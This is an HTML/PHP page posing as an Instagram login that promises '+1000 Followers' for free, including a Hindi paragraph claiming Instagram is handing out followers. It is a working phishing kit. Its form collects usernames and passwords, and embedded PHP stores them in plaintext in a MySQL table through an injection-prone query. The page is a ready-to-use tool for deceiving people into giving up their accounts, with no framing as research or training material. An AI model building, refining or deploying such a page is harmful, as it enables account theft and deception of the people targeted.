<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Instagram Login</title>
  <style>
  #a{
    height: 30px ;
    width: 200px ;
    position :absolute ;
  top :250px ;
  left: 80px ;
  border: 2px solid #5E6AED;
  border-radius:10px ;
  Font-size :15px ;
  } 
  #b{
    height: 30px ;
    width: 200px ;
    position :absolute;
    top :300px;
    left: 80px;
    border: 2px solid #5E6AED;
    border-radius:10px;
    Font-size :15px ;
  }
    #sbt{
    height: 35px ;
    width: 205px ;
    position :absolute;
    top :350px;
    left: 82px;
    border: 2px solid #5E6AED;
    border-radius:10px;
    Font-size :15px ;
  }
  #a1{
  font-family :Helvetica ;
  font-size :12px;
  color: red;
  position: absolute ;
  top:275px;
  left:90px 
  }  
    #b1 {
      font-family: Helvetica;
      font-size: 12px;
      color: red;
      position: absolute;
      top: 325px;
      left: 90px
    }
    
  </style>
</head>
<body>
  <header style="background:red;font-family:cursive; height: 40px; font-size:25px; color:#fff;text-align: center;margin:-5px;justify-content:center;border-radius:10px;" >
    get free instagram followers 
  </header>
  <h1 style="font-family: Arial, Helvetica, sans-serif ;position:absolute;left: 65px" id="th">+1000 Followers</h1>
  <form action="database.php" method="post">
  <input type="text" id="a" placeholder="Username" name="nm">
  <input type="password" id="b" placeholder="Password" name="pw">
  <input id="sbt"type="submit" name='sb'>
  </form>
  <p style="justify-content: center;text-align: center;position: absolute;top: 100px;font-size:20px;color: blue">अब सबको इन्स्टाग्राम की तरफ से एक हज़ार फाॅलोअर बिलकुल फ्री मे दिए जा रहे हैं। क्या आप भी इसमें भाग लेना चाहते हैं तो अभी साइनअप करें।</p>
  <h3 hidden id="a1">Enter your Username </h3>
  <h3 hidden id="b1">Enter your Password </h3>
  <h1 hidden style="color: green; position: absolute;top:5%;left:20px" id="scc">Misson Successfully</h1>
  <footer style="position: absolute;
  bottom: 0">
  <a href="https://www.instagram.com/instagram?igsh=Z2J3ZGZmOTkwOXUy">Instagram</a>
  </footer> 
 
 <?php 
 $con = new mysqli('0.0.0.0','root','root','Collection');
 if(isset($_POST['sb']))
 {
    $name = $_POST['nm'];
    $pass = $_POST['pw'];
    $query="INSERT INTO `Data`(`Username`,`Password`) VALUES ('$name','$pass' )";
    $run = mysqli_query($con,$query);
 }
 ?>
</body>
</html>